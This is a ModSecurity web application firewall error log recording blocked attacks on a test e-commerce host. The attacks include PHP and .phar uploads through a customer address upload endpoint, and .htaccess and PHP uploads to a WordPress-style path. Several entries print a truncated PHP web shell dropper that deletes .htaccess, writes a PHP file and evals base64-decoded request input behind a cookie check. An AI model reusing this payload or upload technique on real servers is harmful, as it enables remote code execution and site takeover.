[Tue Feb 10 06:07:34.498590 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.phar"] [unique_id "aYq9FlF_SARmWfWvHOQXjQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:34.498767 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.phar"] [unique_id "aYq9FlF_SARmWfWvHOQXjQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:35.050776 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 5g88364f428d25.php8 found within FILES:custom_attributes[country_id]: 5g88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYq9F1F_SARmWfWvHOQXjgAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/g/5g88364f428d25.phar
[Tue Feb 10 06:07:35.051448 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYq9F1F_SARmWfWvHOQXjgAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/g/5g88364f428d25.phar
[Tue Feb 10 06:07:35.051613 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYq9F1F_SARmWfWvHOQXjgAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/g/5g88364f428d25.phar
[Tue Feb 10 06:07:35.238496 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Rule 7ffb7a009be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.php8"] [unique_id "aYq9F1F_SARmWfWvHOQXjwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:35.238967 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.php8"] [unique_id "aYq9F1F_SARmWfWvHOQXjwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:35.241624 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.php8"] [unique_id "aYq9F1F_SARmWfWvHOQXjwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:35.241812 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.php8"] [unique_id "aYq9F1F_SARmWfWvHOQXjwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:16.835348 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Rule 7ffb7a009be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.phar"] [unique_id "aYukWJbfyNs4a2OgRWhXpQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:16.835844 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.phar"] [unique_id "aYukWJbfyNs4a2OgRWhXpQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:16.838215 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.phar"] [unique_id "aYukWJbfyNs4a2OgRWhXpQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:16.838410 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.phar"] [unique_id "aYukWJbfyNs4a2OgRWhXpQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:17.003810 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: zr88364f428d25.php8 found within FILES:custom_attributes[country_id]: zr88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYukWZbfyNs4a2OgRWhXpgAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/r/zr88364f428d25.phar
[Tue Feb 10 22:34:17.004427 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYukWZbfyNs4a2OgRWhXpgAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/r/zr88364f428d25.phar
[Tue Feb 10 22:34:17.004613 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYukWZbfyNs4a2OgRWhXpgAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/r/zr88364f428d25.phar
[Tue Feb 10 22:34:17.148580 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Rule 7ffb7a009be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.php8"] [unique_id "aYukWZbfyNs4a2OgRWhXpwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:17.149025 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.php8"] [unique_id "aYukWZbfyNs4a2OgRWhXpwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:17.151505 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.php8"] [unique_id "aYukWZbfyNs4a2OgRWhXpwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 22:34:17.151701 2026] [:error] [pid 1988155] [client 46.149.66.101:35712] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/r/zr88364f428d25.php8"] [unique_id "aYukWZbfyNs4a2OgRWhXpwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 03:56:45.713231 2026] [:error] [pid 2009515] [client 156.226.23.157:64066] [client 156.226.23.157] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: txets.php found within FILES:file: txets.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYvv7T6VdxcPlkKUWJOKygAAAAM"]
[Wed Feb 11 03:56:45.713758 2026] [:error] [pid 2009515] [client 156.226.23.157:64066] [client 156.226.23.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYvv7T6VdxcPlkKUWJOKygAAAAM"]
[Wed Feb 11 03:56:45.713924 2026] [:error] [pid 2009515] [client 156.226.23.157:64066] [client 156.226.23.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYvv7T6VdxcPlkKUWJOKygAAAAM"]
[Wed Feb 11 11:02:19.536021 2026] [:error] [pid 2009707] [client 101.99.88.90:50658] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTqxHU-Z2cdguy-dxaIQAAAAU"]
[Wed Feb 11 11:02:19.536213 2026] [:error] [pid 2009707] [client 101.99.88.90:50658] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTqxHU-Z2cdguy-dxaIQAAAAU"]
[Wed Feb 11 11:02:19.536378 2026] [:error] [pid 2009707] [client 101.99.88.90:50658] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTqxHU-Z2cdguy-dxaIQAAAAU"]
[Wed Feb 11 11:02:19.705211 2026] [:error] [pid 2009707] [client 101.99.88.90:50658] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ex.php found within FILES:file: ex.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTqxHU-Z2cdguy-dxaIgAAAAU"]
[Wed Feb 11 11:02:19.705395 2026] [:error] [pid 2009707] [client 101.99.88.90:50658] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTqxHU-Z2cdguy-dxaIgAAAAU"]
[Wed Feb 11 11:02:19.705563 2026] [:error] [pid 2009707] [client 101.99.88.90:50658] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTqxHU-Z2cdguy-dxaIgAAAAU"]
[Wed Feb 11 11:02:30.383774 2026] [:error] [pid 2009515] [client 101.99.88.90:35082] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ex.php found within FILES:file: ex.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTtj6VdxcPlkKUWJOLGAAAAAM"]
[Wed Feb 11 11:02:30.384960 2026] [:error] [pid 2009515] [client 101.99.88.90:35082] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTtj6VdxcPlkKUWJOLGAAAAAM"]
[Wed Feb 11 11:02:30.385173 2026] [:error] [pid 2009515] [client 101.99.88.90:35082] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYxTtj6VdxcPlkKUWJOLGAAAAAM"]
[Wed Feb 11 14:46:43.170657 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Rule 7f02f380ebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.phar"] [unique_id "aYyIQ93qsyxqMqtCpbq8CQAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 14:46:43.171158 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.phar"] [unique_id "aYyIQ93qsyxqMqtCpbq8CQAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
